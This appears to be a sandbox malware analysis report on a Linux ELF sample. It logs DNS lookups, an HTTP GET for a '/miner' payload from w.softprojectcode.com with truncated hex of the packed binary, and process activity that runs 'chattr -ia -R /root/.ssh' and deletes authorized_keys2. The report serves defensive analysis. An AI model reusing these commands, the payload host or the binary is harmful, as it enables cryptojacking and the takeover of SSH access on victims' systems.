      Mar 9, 2025 17:29:15.266959906 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:15.267383099 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:15.267435074 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:19.187820911 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:19.187988043 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:19.187997103 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:19.188054085 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:26.826394081 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:26.826441050 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:26.826812983 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:26.826813936 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:27.062920094 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:27.062971115 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:27.063231945 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:27.063232899 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:27.893641949 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:27.893661976 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:27.893945932 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:27.893945932 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:28.531433105 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:28.531478882 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:28.531769037 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:28.531769037 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:29.616420031 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:29.616475105 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:29.616513014 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:29.616568089 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:29.616750956 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:29.616750956 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:29.616750956 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:29.616786957 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:30.694897890 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:30.694960117 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:30.695101023 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:30.695101023 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:30.942929029 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:30.942980051 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:30.943041086 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:30.943069935 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:30.943089962 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:30.943089962 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:30.943089962 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:30.943142891 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:31.134861946 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:31.134898901 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:31.134934902 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:31.134968996 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:31.135101080 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:31.135154963 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:31.135176897 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:31.135176897 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:31.771017075 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:31.771066904 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:31.771343946 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:31.771343946 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:32.592995882 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:32.593049049 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:32.593086958 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:32.593135118 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:32.593136072 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:32.593136072 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:32.784941912 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:32.785013914 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:32.785044909 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:32.785067081 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:32.785067081 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:32.785080910 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:32.785099983 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:32.785119057 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:32.785155058 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:32.785171032 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:39.650875092 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:39.650913954 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:39.651137114 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:39.651173115 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.035048962 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.035072088 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.035089016 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.035105944 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.035128117 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.035218000 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.035243034 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.035243034 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.035285950 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.035286903 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.035352945 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.035412073 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.226697922 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.226744890 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.226784945 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.226959944 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.227001905 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.227001905 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.640125036 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.640166998 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.640201092 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.640237093 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.640328884 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.640328884 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.640362978 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.640377998 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.999103069 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.999238968 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.999274969 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:40.999294043 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.999322891 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:40.999322891 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:41.598119974 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:41.598176003 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:41.598216057 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:41.598259926 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:41.598259926 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:41.598259926 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:41.934272051 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:41.934318066 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:41.934355021 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:41.934570074 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:41.934596062 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:41.934602976 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:42.833801985 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:42.833852053 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:42.834120035 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:42.834146023 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:43.836905003 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:43.836955070 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:43.837038040 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:43.837073088 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:43.837109089 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:43.837263107 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:43.837263107 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:43.837263107 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:43.837263107 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:43.837263107 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:45.650810003 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:45.650857925 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:45.651122093 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:45.651145935 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:45.899941921 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:45.899961948 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:45.899975061 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:45.900103092 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:45.900155067 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:45.900155067 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:49.740864038 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:49.740905046 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:49.741080999 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:49.741111994 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.182408094 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:50.182501078 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:50.182533026 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:50.182534933 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.182534933 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.182570934 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.182570934 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:50.182611942 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.374171972 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:50.374214888 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:50.374249935 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:50.374284983 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:50.374340057 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.374367952 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.374367952 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.374382973 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:51.572988987 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:51.573060989 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:51.573092937 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:51.573174000 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:51.573174000 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:51.573194981 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.188642979 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.188688993 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.188829899 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.188849926 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379038095 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379074097 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379129887 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379158020 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379179001 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379179001 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379201889 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379246950 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379348040 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379383087 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379410028 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379417896 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379437923 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379478931 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379736900 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.382846117 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.387931108 CET8055378192.186.12.50192.168.2.13
      TimestampSource PortDest PortSource IPDest IP
      Mar 9, 2025 17:28:10.368211031 CET3605153192.168.2.138.8.8.8
      Mar 9, 2025 17:28:10.368339062 CET3672653192.168.2.138.8.8.8
      Mar 9, 2025 17:28:10.381171942 CET53360518.8.8.8192.168.2.13
      Mar 9, 2025 17:28:10.382752895 CET53367268.8.8.8192.168.2.13
      Mar 9, 2025 17:30:53.678282976 CET5563853192.168.2.138.8.8.8
      Mar 9, 2025 17:30:53.678419113 CET5532853192.168.2.138.8.8.8
      Mar 9, 2025 17:30:53.684900999 CET53556388.8.8.8192.168.2.13
      Mar 9, 2025 17:30:53.685023069 CET53553288.8.8.8192.168.2.13

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Mar 9, 2025 17:28:10.368211031 CET192.168.2.138.8.8.80x9bb0Standard query (0)w.softprojectcode.comA (IP address)IN (0x0001)false
      Mar 9, 2025 17:28:10.368339062 CET192.168.2.138.8.8.80x84faStandard query (0)w.softprojectcode.com28IN (0x0001)false
      Mar 9, 2025 17:30:53.678282976 CET192.168.2.138.8.8.80x2048Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
      Mar 9, 2025 17:30:53.678419113 CET192.168.2.138.8.8.80x6578Standard query (0)daisy.ubuntu.com28IN (0x0001)false

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Mar 9, 2025 17:28:10.381171942 CET8.8.8.8192.168.2.130x9bb0No error (0)w.softprojectcode.com192.186.12.50A (IP address)IN (0x0001)false
      Mar 9, 2025 17:28:10.381171942 CET8.8.8.8192.168.2.130x9bb0No error (0)w.softprojectcode.com107.167.42.211A (IP address)IN (0x0001)false
      Mar 9, 2025 17:28:10.381171942 CET8.8.8.8192.168.2.130x9bb0No error (0)w.softprojectcode.com107.167.42.210A (IP address)IN (0x0001)false
      Mar 9, 2025 17:28:10.381171942 CET8.8.8.8192.168.2.130x9bb0No error (0)w.softprojectcode.com107.167.34.74A (IP address)IN (0x0001)false
      Mar 9, 2025 17:28:10.381171942 CET8.8.8.8192.168.2.130x9bb0No error (0)w.softprojectcode.com107.167.34.78A (IP address)IN (0x0001)false
      Mar 9, 2025 17:28:10.381171942 CET8.8.8.8192.168.2.130x9bb0No error (0)w.softprojectcode.com192.186.12.54A (IP address)IN (0x0001)false
      Mar 9, 2025 17:30:53.684900999 CET8.8.8.8192.168.2.130x2048No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
      Mar 9, 2025 17:30:53.684900999 CET8.8.8.8192.168.2.130x2048No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

      HTTP Request Dependency Graph

      • w.softprojectcode.com

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination Port
      0192.168.2.1355378192.186.12.5080
      TimestampBytes transferredDirectionData
      Mar 9, 2025 17:28:10.400379896 CET102OUTGET /miner HTTP/1.1
      Host: w.softprojectcode.com
      User-Agent: curl/7.68.0
      Accept: */*
      Mar 9, 2025 17:28:34.594938993 CET1236INHTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 09 Mar 2025 16:28:13 GMT
      Content-Type: application/octet-stream
      Content-Length: 1827416
      Last-Modified: Thu, 06 Mar 2025 14:57:05 GMT
      Connection: keep-alive
      ETag: "67c9b7c1-1be258"
      Accept-Ranges: bytes
      Data Raw: 7f 45 4c 46 02 01 01 03 00 00 00 00 00 00 00 00 02 00 3e 00 01 00 00 00 90 d0 5b 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 38 00 02 00 40 00 00 00 00 00 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 cd e1 1b 00 00 00 00 00 cd e1 1b 00 00 00 00 00 00 00 20 00 00 00 00 00 01 00 00 00 06 00 00 00 60 fb 0c 00 00 00 00 00 60 fb ac 00 00 00 00 00 60 fb ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 29 5d f5 f7 55 50 58 21 4c 11 0d 16 00 00 00 00 c8 d0 4b 00 c8 d0 4b 00 58 01 00 00 6b 00 00 00 0e 00 00 00 1a 03 00 3f 91 45 84 68 3d 89 a6 da 8a cc 93 e2 4e d9 06 b7 b9 e2 8b 65 e1 a7 e4 55 9b b4 84 de f6 62 6f a5 47 ae 8a b3 79 a0 a2 24 03 c8 1a 70 4c c4 3a 72 7a 33 91 18 d8 ac d6 88 bd ec 7b 77 c0 f6 a7 ee f7 a9 e6 a8 60 d9 0d 1a 85 41 05 bf 68 c3 f0 c5 54 d3 4e 46 25 c1 dd 46 4d d0 25 6a 0b dd ac c6 be 6b d2 3e 68 23 72 15 4f 48 00 f2 52 1b 00 0e 00 00 00 1a 03 00 28 3a 0e 4d [TRUNCATED]
      Data Ascii: ELF>[@@8@@@ ``` )]UPX!LKKXk?Eh=NeUboGy$pL:rz3{w`AhTNF%FM%jk>h#rOHR(:M1@7NJ.m'>JT[[f=.NO()vS_#;dq27}pDoB"NZ~}l:O&HJ.5NQQ>Jt^petqd},7ETlm.Q"2x}XvER(Nt9D*u"T13=7FWfBajFy'RX,Xr,%Fu:5!kPdqQ&/VGkb>lq4l~Jp[{q;40i!$jDb&<.aKS *3j6Z,Zr^qHiFD/0HoL]:V+K]X/?07[X1m<$IOFoI^setl#cL}v?NgTIkUg],O)?2K^I3-)\yaR]4\>wE
      Mar 9, 2025 17:28:34.594993114 CET248INData Raw: 8a 78 62 e7 8c 98 05 ae 7a 5b 0b 27 34 e2 f4 31 ba 1e 71 b8 45 dc 90 24 f9 cd d5 67 14 ee 81 6b 41 74 83 1f d1 73 32 1a 81 b7 21 4e 5b 68 7e d3 a0 12 9c b6 b3 bb 3e f8 d1 27 9a 09 2d 6e 33 80 3e aa 63 d1 4f 10 60 c4 7f c5 b3 76 90 07 ed 1f 77 b4
      Data Ascii: xbz['41qE$gkAts2!N[h~>'-n3>cO`vw}Xv=cO6:Gl{rx0w9}/3p?Z<TCu?DU~zrTE(`N?}S'ej0!dJU
      Mar 9, 2025 17:28:58.882921934 CET1236INData Raw: 85 8c bf 4e ee 27 11 d5 19 7c 02 31 a7 09 8c 16 4d 83 18 77 7f 04 02 8e 9a 3e 10 96 cc b0 69 5e 9f 37 33 a3 9a c7 70 10 8a cd a0 f1 a3 bf 16 51 dd aa 5b 51 32 91 d7 30 44 eb ef 79 19 75 c0 88 bb ca a8 0a 6e 81 fb f2 c0 de 7d 6b 0c 83 27 5f 58 80
      Data Ascii: N'|1Mw>i^73pQ[Q20Dyun}k'_XlE@nfZ,+Lv]pF}cI~mImli]LwxB@L_lw: UnXU.Q"YnI5.A|Z38OF"N3K@n
      Mar 9, 2025 17:28:58.882967949 CET248INData Raw: 8f ee d8 01 82 ca b5 2d 4b 4a 67 09 4b ea 5c 5a 53 34 b7 6b 08 d6 e4 b3 d6 ac bc 50 0d c7 09 5b 03 4c 48 9b 66 8b 93 05 59 e5 26 83 3a cd 56 8d 20 94 81 bc aa 75 29 0c 97 9f 73 f4 41 e6 93 6d 9f 05 1a 3c b2 14 ab 30 c3 83 18 27 e9 20 fc 51 48 5f
      Data Ascii: -KJgK\ZS4kP[LHfY&:V u)sAm<0' QH_9Pv:]}LLLPj1va`H=_L<BS;3}XT<Rie0]/FE.{k;cjyBH!,LvpN=>
      Mar 9, 2025 17:28:59.319947004 CET1236INData Raw: 72 a8 fa b9 f1 49 69 45 6e 0b 22 05 8a 0e f1 a4 4f ac aa 80 57 5b 56 4b 8d 9a 3d 5d 1d 11 6b 00 22 12 cd 46 54 01 33 f5 d9 af 92 3e af 40 fa 6f ea 1c ed 12 bb 6c 03 38 12 36 47 2b d7 86 2c 27 99 01 fa e3 aa 1a 5f 53 10 65 46 2b 8d bf 5d 67 1e aa
      Data Ascii: rIiEn"OW[VK=]k"FT3>@ol86G+,'_SeF+]g4G"&Dg2_KP7~:3k'8ZJA1H]np<12b&KI<47ydZ<iXEkvI!%;tZb@Ku
      Mar 9, 2025 17:28:59.320008993 CET1236INData Raw: 3f 70 8d c7 60 92 72 2d 4a b3 f0 8e 16 5e d1 ab ea 96 52 fc bb 7a ed 2b 99 a0 ac e3 60 9d 0d 4e 0b 9f 73 01 3e ac 9f 00 75 df 3f 44 3e 3f 95 4f 61 20 4c 85 50 6f b8 36 a6 87 2e 0f 64 98 ed cd 23 a0 dd 6b 09 a0 0a f1 d1 07 33 02 6d ca 4c 97 70 95
      Data Ascii: ?p`r-J^Rz+`Ns>u?D>?Oa LPo6.d#k3mLp}Ij2$Y^gAuu5s!HZgP_0}o:<;yg'lk@?XT6A?q_J`L9x{._l_C@G|@{=Rdav9u~
      Mar 9, 2025 17:28:59.320041895 CET1236INData Raw: 33 0b 4c c8 af a7 43 61 b0 08 bd 5e 0b d2 50 3a 47 2f 88 2b 3f 65 88 20 8a ee 79 02 de 0c d8 bc 35 0c c0 af a7 b8 8d b5 64 82 16 52 5c dc 69 ed 10 5c 99 9f 8a 87 49 c9 07 3f ae 96 53 8e 91 10 b6 5c 99 51 df ca cb 57 0a 1e 9e 55 cc f6 2a 27 20 ed
      Data Ascii: 3LCa^P:G/+?e y5dR\i\I?S\QWU*' 9ytRTFe'pgGS'7WtEs:]y#Z^W3;EH-D$..Y@AKu"eR#!CvD9JJs+kCykEg0Y Q&t}{?
      Mar 9, 2025 17:28:59.320077896 CET720INData Raw: 7c fa b3 c3 28 96 f5 22 68 fb 97 79 6c b9 4d 07 71 aa f8 64 78 1e 2f c9 c6 f6 36 91 15 84 63 b9 5b ee 6f c8 55 b5 d2 87 56 63 fb c0 8a dc 3a 2e 59 7d 2c 7d 88 c6 ae 19 31 35 bc 2b e9 11 8a aa 40 be 7b 44 28 32 e7 11 99 e0 93 46 34 04 59 58 40 a3
      Data Ascii: |("hylMqdx/6c[oUVc:.Y},}15+@{D(2F4YX@a#(@j kL!37k;n+V_jI-#EVYgiEZ]bxxvh)'ZXU-qjXzXJ*j@V"s*H0
      Mar 9, 2025 17:29:00.087239027 CET1236INData Raw: bb 3a e0 40 cd 3e eb fd 5d 02 07 3f a6 26 e9 c4 57 31 66 fa 40 e3 04 91 ad ea b9 d0 c2 d8 b1 bf 87 31 63 1c 55 d3 2f e3 cc 51 29 11 f0 e2 04 82 26 ed b1 51 44 bb 57 04 1b b4 7a 00 dc 75 b9 56 1f de 7a 96 ef 73 fa 49 c9 67 a3 35 69 bb b6 66 b5 de
      Data Ascii: :@>]?&W1f@1cU/Q)&QDWzuVzsIg5ifizz~nHf3PiZ${bD~qe;%=K'o2,@wJ>RL97>IB{[Z)kC$dw-Dm#{/|b
      Mar 9, 2025 17:29:00.087275028 CET248INData Raw: d4 28 1f 65 0c 13 d6 92 09 67 07 cd 32 5b 58 77 45 08 e9 07 e7 0b 3f f0 b9 4c bf b0 93 19 20 0f ed e6 6c 3a fa 18 80 88 6c 7f fe 6a 75 a9 21 b9 af ea 00 69 d0 4e 8f 23 79 7d 5c 8c c6 1b f1 84 16 81 a4 fd 4e b5 89 af a0 f0 1d 1e 1f 7d db 7c b5 39
      Data Ascii: (eg2[XwE?L l:lju!iN#y}\N}|9g0}*Z1) gcru&WxF^/;>vzBr5C$2:G`&Uhek!c_eZ82vbAL=Tg*f\3f^-ue?Q#l
      Mar 9, 2025 17:29:00.875767946 CET1236INData Raw: 6e 94 0c 8c 5a 40 c2 f2 2d 02 b1 a2 f7 4e 4f f4 2d 68 6e 17 c4 0f c4 1c 4c ae 0e 12 e4 06 33 ca 94 a8 78 bb 05 96 df 42 a9 f0 a2 66 f9 11 87 2a b2 28 c7 3d 2e b6 52 2e 49 25 02 c4 69 68 b4 d4 c8 91 4e c3 de 2d 93 2f 41 81 b1 da 9c 45 85 80 ae 34
      Data Ascii: nZ@-NO-hnL3xBf*(=.R.I%ihN-/AE4Q>x/gwQ+BnB0Y2d]zfK3r$aSWXNGFK"\TG6_^ne>{@AcB.#XnCD79Tt++UJSG:


      System Behavior

      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:/tmp/gif.elf
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /root/.ssh"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /root/.ssh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      File Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "rm -rf /root/.ssh/authorized_keys2"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      File Activities

      Process Activities


      General

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
